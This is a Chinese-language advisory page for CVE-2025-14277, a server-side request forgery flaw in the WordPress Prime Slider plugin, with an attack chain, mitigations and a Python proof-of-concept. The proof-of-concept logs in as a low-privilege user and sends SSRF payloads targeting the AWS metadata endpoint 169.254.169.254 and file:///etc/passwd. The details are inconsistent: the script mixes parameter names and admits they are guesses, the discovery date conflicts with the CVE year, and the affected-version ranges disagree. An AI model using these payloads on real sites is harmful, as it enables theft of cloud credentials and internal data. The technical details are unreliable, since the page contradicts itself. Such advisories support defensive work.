CVE-2025-14277 WordPress Prime Slider插件服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-14277

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Prime Slider – Addons for Elementor (WordPress插件)

漏洞概述

CVE-2025-14277是WordPress平台下Prime Slider插件的一个服务器端请求伪造（SSRF）安全漏洞。该插件是一款广受欢迎的Elementor页面构建器扩展组件，为用户提供幻灯片、滑块等高级UI组件功能。漏洞存在于插件的import_elementor_template AJAX动作中，存在于所有版本直至4.0.9。攻击者利用此漏洞可以绕过服务器安全限制，以受影响的Web应用程序作为代理发起请求，访问内部网络资源、读取本地文件或探测内网服务。此漏洞需要认证才能利用，但权限要求极低，订阅者级别（subscriber）的用户即可触发。由于WordPress默认开放注册功能，攻击者可以轻易注册低权限账户实施攻击。漏洞由Wordfence安全团队于2024年发现并报告，CVSS评分4.3，属于中等严重程度。

技术细节

漏洞根源在于Prime Slider插件的import_elementor_template AJAX动作未对用户提交的URL参数进行充分验证。攻击者可以通过构造恶意请求，指定任意URL作为模板导入源。当插件处理该请求时，会使用PHP的file_get_contents或cURL等函数向指定URL发起HTTP请求。由于请求由服务器端发起，攻击者可以借此访问本应仅限服务器内部访问的资源。攻击者通常利用此漏洞进行以下操作：1）端口扫描内网服务，通过响应时间判断端口开放状态；2）读取本地文件如file:///etc/passwd；3）探测云元数据服务如AWS EC2元数据端点169.254.169.254；4）攻击内部Web应用。由于该AJAX端点未设置合理的权限检查，仅验证用户已登录而非高权限角色，导致任何已认证用户都可利用此功能。

攻击链分析

STEP 1

步骤1

攻击者在目标WordPress站点注册订阅者级别账户或获取已有低权限账户凭据

STEP 2

步骤2

攻击者构造包含恶意URL参数的AJAX请求，目标指向import_elementor_template动作端点

STEP 3

步骤3

服务器接收请求后，插件未验证URL合法性，直接使用file_get_contents或cURL发起请求

STEP 4

步骤4

攻击者通过响应内容获取内网资源数据，如本地文件内容、内网服务响应、云元数据信息

STEP 5

步骤5

利用获取的内部信息进一步实施横向移动或提权攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14277 PoC - Prime Slider SSRF
# Target: WordPress site with vulnerable Prime Slider plugin (<=4.0.9)

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com'

# Authentication setup
# Register as subscriber or use existing low-privilege account
session = requests.Session()

# Login as subscriber-level user
login_url = f'{target}/wp-login.php'
login_data = {
    'log': 'attacker_username',
    'pwd': 'attacker_password',
    'wp-submit': 'Log In'
}

session.post(login_url, data=login_data)

# Exploit SSRF via import_elementor_template AJAX action
ssrf_url = f'{target}/wp-admin/admin-ajax.php'

# Example 1: Port scanning internal services
payload = {
    'action': 'import_elementor_template',
    'server_addr': '192.168.1.1',
    'server_port': '8080'
}

# Example 2: Access internal metadata (AWS)
payload_metadata = {
    'action': 'import_elementor_template',
    'template_url': 'http://169.254.169.254/latest/meta-data/'
}

# Example 3: Read local files
payload_file = {
    'action': 'import_elementor_template',
    'template_url': 'file:///etc/passwd'
}

response = session.post(ssrf_url, data=payload_metadata)
print(f'Status: {response.status_code}')
print(f'Response: {response.text[:500]}')

# Note: Actual exploitation depends on plugin's specific parameter names
# Check Wordfence advisory for exact request format

影响范围

Prime Slider – Addons for Elementor < 4.0.9 (所有版本)

Prime Slider Lite < 4.0.9

Prime Slider Pro < 4.0.9

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1）暂时禁用Prime Slider插件直至完成升级；2）通过.htaccess或Nginx配置限制服务器对内网IP段（如10.0.0.0/8、172.16.0.0/12、192.168.0.0/16）及云元数据端点的出站请求；3）禁用WordPress站点的用户注册功能；4）使用安全插件限制低权限用户的AJAX调用能力；5）配置PHP的allow_url_fopen和allow_url_include为Off以减少攻击面。这些措施仅为临时方案，无法替代升级到安全版本。